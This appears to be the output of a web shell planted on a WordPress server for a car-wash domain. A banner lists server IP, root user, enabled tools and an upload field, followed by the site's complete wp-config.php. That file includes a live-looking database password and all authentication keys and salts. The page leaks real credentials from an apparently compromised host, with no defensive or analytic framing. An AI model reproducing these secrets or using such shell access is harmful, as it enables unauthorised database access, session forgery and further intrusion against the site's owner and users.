| Server IP : 178.128.116.179 / Your IP : 216.73.216.206 Web Server : nginx/1.30.3 System : Linux glamautowash 6.8.0-71-generic #71-Ubuntu SMP PREEMPT_DYNAMIC Tue Jul 22 16:52:38 UTC 2025 x86_64 User : root ( 0) PHP Version : 8.4.22 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/glamautowash.com/ |
Upload File : |
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * Localized language
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'glam' );
/** Database username */
define( 'DB_USER', 'glam' );
/** Database password */
define( 'DB_PASSWORD', 'zCASLynRKs3dBpKj8Z79MfXq9kmBbW' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', '5wSre8wG/;-[1d~OXIM5A0Af[9Ob/isdRq;s0u873!86:2h56*DA6KkdLw;#a837');
define('SECURE_AUTH_KEY', '97A#IHJ36]|V#I41NnZ-Nl](evfj55v]8R*l%j2~uDLrVT80obSt(*8;B3X;5&%9');
define('LOGGED_IN_KEY', 'Mf87+K9*9FIsOa-3|M]D%)8-uTmA44_4vr7/J(F#F0jq)5!2b1!XdwT|VN2j#3Xf');
define('NONCE_KEY', 'x%omDxQh~Zk@X|kOBP/zjG)d~iNxlFpsUB;i3NC9xesD7i3+C;4lG_||9y_80R@+');
define('AUTH_SALT', '7S5;l92T3ikb#NNlQw/BA)k#79uI8U6ySE&W4+T|(10lp#5i#b_]2]kXN4bx0knR');
define('SECURE_AUTH_SALT', 'CK1qe3%h7169b2Iz9Tw9*s]Egq%J6(n59lE5ocKdu~4lYyE5A(3)#-29CKN%LB@2');
define('LOGGED_IN_SALT', 'Fj]22/8Jrr&*6jW~8Kc(GE%E;]bF6*c|;3ygE37Sr21:B~r!Np*~3/(Z@~3YQRL*');
define('NONCE_SALT', ')9381gGgh(M;BZb(X_vI:6eio8B20-9D_RaS;1Gy|Q~61I_05cR45O3tLRI@SpQ]');
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'MOPCZH_';
/* Add any custom values between this line and the "stop editing" line. */
define('WP_ALLOW_MULTISITE', true);
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
if ( ! defined( 'WP_DEBUG' ) ) {
define( 'WP_DEBUG', false );
}
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';